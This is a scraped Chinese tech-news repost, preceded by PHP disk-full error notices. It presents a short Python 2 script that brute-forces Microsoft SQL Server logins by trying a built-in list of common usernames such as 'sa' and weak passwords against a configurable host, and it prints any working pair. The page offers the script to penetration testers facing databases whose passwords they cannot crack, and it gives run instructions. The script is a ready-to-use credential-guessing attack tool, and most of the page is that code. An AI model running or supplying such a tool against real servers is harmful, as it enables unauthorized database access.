Notice (8): file_put_contents(): Write of 274 bytes failed with errno=28 No space left on device [CORE/src/Log/Engine/FileLog.php, line 140]

Notice: file_put_contents() [function.file-put-contents]: Write of 1108 bytes failed with errno=28 No space left on device in /www/wwwroot/www.adminso.com/vendor/cakephp/cakephp/src/Log/Engine/FileLog.php on line 140
Notice (8): SplFileObject::fwrite() [<a href='https://secure.php.net/splfileobject.fwrite'>splfileobject.fwrite</a>]: Write of 284 bytes failed with errno=28 No space left on device [CORE/src/Cache/Engine/FileEngine.php, line 141]

Notice: file_put_contents() [function.file-put-contents]: Write of 2558 bytes failed with errno=28 No space left on device in /www/wwwroot/www.adminso.com/vendor/cakephp/cakephp/src/Log/Engine/FileLog.php on line 140
Notice (8): SplFileObject::fwrite() [<a href='https://secure.php.net/splfileobject.fwrite'>splfileobject.fwrite</a>]: Write of 5437 bytes failed with errno=28 No space left on device [CORE/src/Cache/Engine/FileEngine.php, line 141]

Notice: file_put_contents() [function.file-put-contents]: Write of 3151 bytes failed with errno=28 No space left on device in /www/wwwroot/www.adminso.com/vendor/cakephp/cakephp/src/Log/Engine/FileLog.php on line 140
Notice (8): unserialize() [<a href='https://secure.php.net/function.unserialize'>function.unserialize</a>]: Error at offset 94197 of 94197 bytes [APP/Controller/NewsController.php, line 5571]

Notice: file_put_contents() [function.file-put-contents]: Write of 2489 bytes failed with errno=28 No space left on device in /www/wwwroot/www.adminso.com/vendor/cakephp/cakephp/src/Log/Engine/FileLog.php on line 140
Notice (8): unserialize() [<a href='https://secure.php.net/function.unserialize'>function.unserialize</a>]: Error at offset 94197 of 94197 bytes [APP/Controller/NewsController.php, line 5571]

Notice: file_put_contents() [function.file-put-contents]: Write of 2489 bytes failed with errno=28 No space left on device in /www/wwwroot/www.adminso.com/vendor/cakephp/cakephp/src/Log/Engine/FileLog.php on line 140
Python版Mssql爆破小脚本 - 站长搜索
首页 > 资讯列表 > 编程/数据库 >> 数据库操作教程

Python版Mssql爆破小脚本

数据库操作教程 2022-09-23 18:14:06 转载来源: 网络整理/侵权必删

MssqlPython版本爆破小脚本,需要安装MSSQL-python.exe可以看出代码量很少,用法:保存代码为MssqlDatabaseBlasting.py,cmd切换到MssqlDatabaseBlasting.py路径下,并执行MssqlDatabaseBlasting.py即可开始破解importpymssqlcommon_weak_password=('','123456','test','root','admin','user')#密码字典mssql_username=('sa','test','admin','mssql')#账号字典success=Falsehost="127.0.0.1"#数据库IP地址port=1443forusernameinmssql_username:forpasswordincommon_weak_password:try:db=pymssql.connect(server=host,port=port,user=username,password=password)success=Trueifsuccess:printusername,

Mssql Python版本爆破脚本,需要安装 MSSQL-python.exe 可以看出代码量很少,用法:保存代码为MssqlDatabaseBlasting.py,cmd切换到 MssqlDatabaseBlasting.py路径下,并 执行 MssqlDatabaseBlasting.py即可开始破解

import pymssqlcommon_weak_password = ('','123456','test','root','admin','user')#密码字典mssql_username = ('sa', 'test', 'admin', 'mssql')#账号字典success = Falsehost = "127.0.0.1"#数据库IP地址port = 1443for username in mssql_username:  for password in common_weak_password:    try:      db = pymssql.connect(server=host, port=port, user=username, password=password)      success = True      if success:        print username, password    except Exception, e:      pass

说明:看到很多网络安全爱好者,在进行渗透测试的时候,遇到数据库可以远程管理,但是无法破解其账号密码,所以此篇文章就推送几个脚本进行渗透。

标签: Python Mssql 爆破 脚本


声明:本文内容来源自网络,文字、图片等素材版权属于原作者,平台转载素材出于传递更多信息,文章内容仅供参考与学习,切勿作为商业目的使用。如果侵害了您的合法权益,请您及时与我们联系,我们会在第一时间进行处理!我们尊重版权,也致力于保护版权,站搜网感谢您的分享!

站长搜索

http://www.adminso.com

Copyright @ 2007~2025 All Rights Reserved.

Powered By 站长搜索

打开手机扫描上面的二维码打开手机版


使用手机软件扫描微信二维码

关注我们可获取更多热点资讯

站长搜索目录系统技术支持